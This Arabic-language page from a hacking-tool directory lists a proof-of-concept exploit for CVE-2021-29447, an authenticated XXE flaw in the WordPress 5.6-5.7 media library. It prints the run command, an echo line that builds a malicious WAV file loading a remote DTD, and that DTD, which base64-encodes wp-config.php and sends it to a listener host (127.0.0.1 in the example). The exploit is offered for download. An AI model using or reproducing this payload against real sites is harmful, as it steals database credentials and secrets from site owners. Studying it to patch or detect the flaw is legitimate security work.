Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-29447 — إثبات المفهوم لاستغلال CVE-2021-29447: XXE مصادق عليه في مكتبة الوسائط في WordPress 5.6-5.7. يُنتج ملف WAV ضار وDTD لقراءة ملفات الخادم بشكل عشوائي عبر تسريب البيانات خارج النطاق. | Kitploit
أدوات/GitHubGitHub/g01d3nw01f/cve-2021-29447
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubg01d3nw01f/cve-2021-29447

CVE-2021-29447

إثبات المفهوم لاستغلال CVE-2021-29447: XXE مصادق عليه في مكتبة الوسائط في WordPress 5.6-5.7. يُنتج ملف WAV ضار وDTD لقراءة ملفات الخادم بشكل عشوائي عبر تسريب البيانات خارج النطاق.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-29447 WordPress 5.6-5.7 - XXE مصادق عليه (Author+)

https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

الاستخدام:

-l LHOST مثال: 127.0.0.1 -n NAME مثال: payload.wav -dn DTD_NAME مثال: evil.dtd -r READ مثال: ../wp-config.php

evil-wav-dtd-xxe.py: خطأ: الوسائط التالية مطلوبة: -l/--lhost, -n/--name, -dn/--dtd, -r/--read

مثال تشغيل السكريبت:

./evil-wav-dtd-xxe.py -l 127.0.0.1 -n payload.wav -dn evil.dtd -r "../wp-config.php"

root@kitploit:~
[*]Created: evil.dtd
-------------------------------------------------------------------------
-- below commands run in terminal directory: generate the .wav file   --
-------------------------------------------------------------------------
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://127.0.0.1/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

evil.dtd(auto generate)

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://127.0.0.1/?p=%file;'>" >
تنزيل الأداة